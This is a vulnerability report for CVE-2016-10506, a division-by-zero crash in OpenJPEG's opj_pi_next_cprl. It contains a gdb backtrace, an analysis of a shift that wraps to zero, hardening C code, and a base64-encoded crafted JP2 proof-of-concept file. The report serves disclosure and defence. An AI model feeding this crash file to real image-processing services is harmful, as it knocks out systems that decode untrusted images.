trylab changed the title from "division-by-zero (SIGFPE) error in opj_pi_next_cprl function in (line 526 of pi.c)" to "division-by-zero (SIGFPE) error in opj_pi_next_cprl function (line 526 of pi.c)" on Mar 28, 2016
trylab changed the title from "division-by-zero (SIGFPE) error in opj_pi_next_cprl function (line 526 of pi.c)" to "[CVE-2016-10506] division-by-zero (SIGFPE) error in opj_pi_next_cprl function (line 526 of pi.c)" on Aug 30, 2017
Testing Environment
Ubuntu + OpenJPEG (GitHub master, 2016/03/28)
Exception Information
username@ubuntu:~/Desktop/openjpeg/bin$ gdb opj_decompress -q
Reading symbols from opj_decompress...done.
(gdb) r -o image.pgm -i crashes/002.j2k
Starting program: ~/Desktop/openjpeg/bin/opj_decompress -o image.pgm -i crashes/002.j2k
Program received signal SIGFPE, Arithmetic exception.
0xb7fb8d01 in opj_pi_next_cprl (pi=0x8090ec0)
at /home/username/Desktop/openjpeg/src/lib/openjp2/pi.c:526
526 if (!((pi->x % (OPJ_INT32)(comp->dx << rpx) == 0) ||
((pi->x == pi->tx0) && ((trx0 << levelno) % (1 << rpx))))){
(gdb) p comp->dx
$1 = 2
(gdb) p rpx
$2 = 31
(gdb) bt
#0 0xb7fb8d01 in opj_pi_next_cprl (pi=0x8090ec0)
#1 0xb7fbc4cc in opj_pi_next (pi=0x8090ec0)
#2 0xb7fc0b8d in opj_t2_decode_packets (p_t2=0x8090878, p_tile_no=0, p_tile=0x80658d0,
#3 0xb7fc6368 in opj_tcd_t2_decode (p_tcd=0x8065890, p_src_data=0x80668d8 "\337\aV",
#4 0xb7fc5d17 in opj_tcd_decode_tile (p_tcd=0x8065890, p_src=0x80668d8 "\337\aV",
#5 0xb7fa832a in opj_j2k_decode_tile (p_j2k=0x8060298, p_tile_index=0,
#6 0xb7fac369 in opj_j2k_decode_tiles (p_j2k=0x8060298, p_stream=0x8060170, p_manager=0x80601e4)
#7 0xb7fa661e in opj_j2k_exec (p_j2k=0x8060298, p_procedure_list=0x8062420,
#8 0xb7facaf9 in opj_j2k_decode (p_j2k=0x8060298, p_stream=0x8060170,
#9 0xb7fb1aad in opj_jp2_decode (jp2=0x8060210, p_stream=0x8060170,
#10 0xb7fb6c79 in opj_decode (p_codec=0x80601b8, p_stream=0x8060170, p_image=0x8065cc0)
#11 0x0804c2c0 in main (argc=5, argv=0xbffff124)
    at /home/username/Desktop/openjpeg/src/bin/jp2/opj_decompress.c:1330
Simple Analysis
At the crash site comp->dx is 2 and rpx is 31. comp->dx is an OPJ_UINT32, so comp->dx << rpx is a 32-bit unsigned shift: the only set bit of 2 is moved past bit 31 and discarded, and 2 << 31 wraps to 0 instead of 2^32. The cast to OPJ_INT32 leaves the divisor at 0, so pi->x % (OPJ_INT32)(comp->dx << rpx) is an integer division by zero and the process receives SIGFPE.
rpx is built from the precinct size exponent and the resolution level, both of which come from the codestream headers, so a crafted file can push it to 31 or beyond. Any rpx that shifts every set bit of comp->dx out of the 32-bit word yields the same zero divisor, and an rpx of 32 or more makes the shift itself undefined behaviour before the division is even reached.
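The following is an added example written for this page, not OpenJPEG's own code or the project's fix. It reproduces the divisor computation from pi.c line 526 with the types OpenJPEG uses, shows how the crash values arise, and puts a precondition check in front of the modulo so a caller skips the test instead of dividing by zero. The formula for rpx (precinct exponent plus resolution level) is assumed from the structure of opj_pi_next_cprl; the helper names are mine.

```c
#include <stdint.h>
#include <stdio.h>

/* OpenJPEG's types: comp->dx is OPJ_UINT32, the divisor is cast to OPJ_INT32. */
typedef uint32_t OPJ_UINT32;
typedef int32_t  OPJ_INT32;

/* Shift exponent as opj_pi_next_cprl forms it (assumed from pi.c, hypothetical helper):
 * rpx = res->pdx + levelno, with levelno = numresolutions - 1 - resno.
 * pdx is the precinct width exponent from the COD/COC marker (0..15) and
 * numresolutions is decomposition levels + 1, so rpx can reach 31 and above. */
OPJ_UINT32 compute_rpx(OPJ_UINT32 numresolutions, OPJ_UINT32 resno, OPJ_UINT32 pdx)
{
    OPJ_UINT32 levelno = numresolutions - 1 - resno;
    return pdx + levelno;
}

/* The divisor exactly as line 526 computes it. The shift happens in 32-bit
 * unsigned arithmetic, so every bit moved past bit 31 is discarded:
 * 2u << 31 loses its only set bit and wraps to 0. */
OPJ_INT32 cprl_divisor(OPJ_UINT32 dx, OPJ_UINT32 rpx)
{
    return (OPJ_INT32)(dx << rpx);
}

/* Precondition a hardened caller runs before the modulo. Rejects:
 *  - dx == 0 (divisor is 0 regardless of the shift);
 *  - rpx >= 32 (shifting by the type width or more is undefined behaviour);
 *  - shifts that drop bits (the divisor wrapped, possibly to 0);
 *  - results above INT32_MAX (the cast to OPJ_INT32 would flip the sign). */
int divisor_is_usable(OPJ_UINT32 dx, OPJ_UINT32 rpx)
{
    if (dx == 0 || rpx >= 32) return 0;
    if (((dx << rpx) >> rpx) != dx) return 0;
    if ((dx << rpx) > (OPJ_UINT32)INT32_MAX) return 0;
    return 1;
}

/* Hardened form of the x-alignment test from line 526.
 * Returns 1 if x is a multiple of dx << rpx, 0 if it is not, and -1 if the
 * test was skipped because the divisor is unusable; a caller should treat -1
 * as "no packet here" and move on rather than divide. */
int x_is_precinct_aligned(OPJ_INT32 x, OPJ_UINT32 dx, OPJ_UINT32 rpx)
{
    if (!divisor_is_usable(dx, rpx)) return -1;
    return (x % cprl_divisor(dx, rpx)) == 0;
}

int main(void)
{
    /* Values observed in the gdb session in this issue. */
    OPJ_UINT32 dx = 2, rpx = 31;
    printf("rpx for 32 resolutions, resno 0, pdx 0: %u\n", compute_rpx(32, 0, 0));
    printf("(OPJ_INT32)(%u << %u) = %d\n", dx, rpx, cprl_divisor(dx, rpx));
    printf("divisor usable: %d, alignment test: %d\n",
           divisor_is_usable(dx, rpx), x_is_precinct_aligned(0, dx, rpx));
    /* A benign pair from an ordinary image: dx=1, rpx=5 gives divisor 32. */
    printf("x=64, dx=1, rpx=5 -> aligned=%d\n", x_is_precinct_aligned(64, 1, 5));
    return 0;
}
```

The round-trip check `((dx << rpx) >> rpx) == dx` is the cheap way to detect that a left shift lost bits; the extra `rpx >= 32` guard is needed because the round-trip itself would be undefined for such shift counts. With the PoC's values the check fails and no division is attempted.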
Proof-of-Concept file
Decode the following base64 content and save the result as a .j2k file to obtain the PoC. Note that the decoded bytes begin with the JP2 signature box (jP  \r\n\x87\n), so the file is a JP2 container around the crafted codestream; opj_decompress identifies the format from these magic bytes rather than from the extension, which is why the backtrace above passes through opj_jp2_decode.
AAAADGpQICANCocKAAAAFGZ0eXBqcDIgAAAAAGpwMiAAAAAtanAyaAAAABZpaGRyAAAAIAAAACAA
AweHAAAAAAAPY29scgEAAAAAABAAAAFnanAyY/9P/1EALwAAAAAAAQAAACAAAAAAAAAAAIAAACAA
AAAgAAAAAAAAAAAAAwcCAQcBAYoBAf9SAAwABAABAREEBIAB/1wABEBA/2QAJQABQ3JlYXRlZCBi
eSBPcGVuSlBFRyB2ZXJzaWZ0eXAuMS4w/5AACgAAAAAA7wAB/5PfB1YANB/WzgwnT0scoB/vuZfg
c1PvCOOcZjXu94sFdFbBplUpDNQKo/J/xlMus9LPf6OB3S2g7cWVduNF1Jaz7rIDsiUuZP97i6v6
AKLEZkELDIYYc/9zmmka8yiifaZFEnVtgpHmcWvWIj909OzjqMTdl/xjGiEA30lKlsnQgHvkAAAA
DCQlU8IGCRzPVltBDquXVV1SKEgCZ6AAAL//MDWwLWWTjY66dD2zcDL4QNwgyHZAed8ygGb/NYsD
EkIdgqz2vhAr2q6hLHANUHiJLHTG3LUbzHETySr/f/9//3//2Q==
Credit
This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.